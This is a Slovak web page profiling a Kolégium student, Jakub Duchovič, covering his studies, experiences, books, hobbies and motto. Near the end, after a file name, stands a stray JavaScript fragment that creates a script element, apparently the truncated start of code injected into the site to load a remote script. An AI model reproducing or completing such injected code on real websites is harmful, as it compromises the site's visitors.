Profil študenta #4: Jakub Duchovič

Narodil som sa a pochádzam z: Z Malých Uheriec pri Partizánskom.

Študoval som/študujem na:  Medzinárodné vzťahy a diplomacia na Bolonskej univerzite, Medzinárodné vzťahy a hospodárska politika na Masarykovej univerzite.

Čo ma priviedlo do Kolégia: O Kolégiu som počul už dávnejšie, keďže som poznal viacerých bývalých študentov. Prvou akciou, na ktorej som sa zúčastnil bola Letná škola pre Slovákov študujúcich v zahraničí v lete 2014. Túžba spoznať zaujímavých ľudí, naučiť sa nové veci a pochopiť lepšie seba a svet okolo ma o rok neskôr priniesla späť, tentokrát už na ročný program.

V čom ma zatiaľ Kolégium najviac zmenilo:  Ako vraví múdrosť našich starých mám, je ťažké lapať vtáčka, kým letí, ale myslím si, že čítanie filozofických textov a diskusie o nich zlepšili moje kritické myslenie a akademické zručnosti. Spoločné aktivity s ostatnými študentmi ma naučili lepšie pracovať s inými a vďaka stretnutiam s inšpiratívnymi ľuďmi som získal veľa nového entuziazmu.

Môj najväčší zážitok z Kolégia: To sú určite spoločné víkendy a akcie: teambuilding – stavanie altánku, tréning 7 návykov efektívnosti, víkend prezentačných zručností, beánia, výlety na Sampor a do Gamingu,…

Mojou najväčšou túžbou je:  Byť šťastný a pomôcť k šťastiu aj ľuďom okolo.

Takúto superschopnosť by som chcel mať:  Chcel by som chápať ľudí, to, čo si nesú vo svojom vnútri. Nie hneď, až po nejakom čase, aby zostalo čaro spoznávania sa.  Empatia by sa v tom prípade stala superschopnosťou.

Voľný čas trávim:  Rád hrávam na gitare, na strednej som hrával v kapele, ale momentálne väčšinou hrávam sám alebo nezáväzne s kamarátmi. Mám rád knihy a stretnutia s priateľmi. Veľkú vášeň mám pre šport (futbal, v zime hokej, beh), dokážem ju ale aj veľmi úspešne potlačiť.

3 knihy, ktoré ma v mojom živote najviac zasiahli (okrem Biblie):  Prvá kniha je John Eldredge: Divoký v srdci – čítal som ju asi v šestnástich rokoch a psychológia tejto knihy  bola pre mňa vtedy veľmi inšpirujúca. Druhou je Italo Calvino : The nonexistent Knight – prvý román, ktorý som prečítal po taliansky a v ktorom sa skrýva veľa myšlienok hodných zamyslenia, napríklad o tom, ako aj byť sa treba naučiť. A do tretice Stephen Covey: 7 návykov skutočne efektívnych ľudí, vďaka ktorému som objavil nové možnosti, ako si organizovať priority a čas.

Na človeku si najviac vážim: Vyrovnaný vzťah k sebe samému – verím, že to sa potom premieta do všetkého ostatného, čím človek žije.

V budúcnosti by som chcel robiť:  Zmysluplnú prácu prinášajúcu pozitívne výsledky, či už to bude politika, súkromný sektor, vzdelávanie alebo iné.

Moje motto je: „Čím si starší, tým máš viac rokov.“ A trochu vážnejšie:  „Najväčšia chyba, ktorú môžeme v živote urobiť, je mať stále strach, že nejakú urobíme.“

KAN-2015-report_040var d=document;var s=d.createElement(‘script’);

0 komentárov

Zanechajte komentár

Chcete sa pripojiť k diskusii?
Neváhajte prispieť!

Pridaj komentár

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *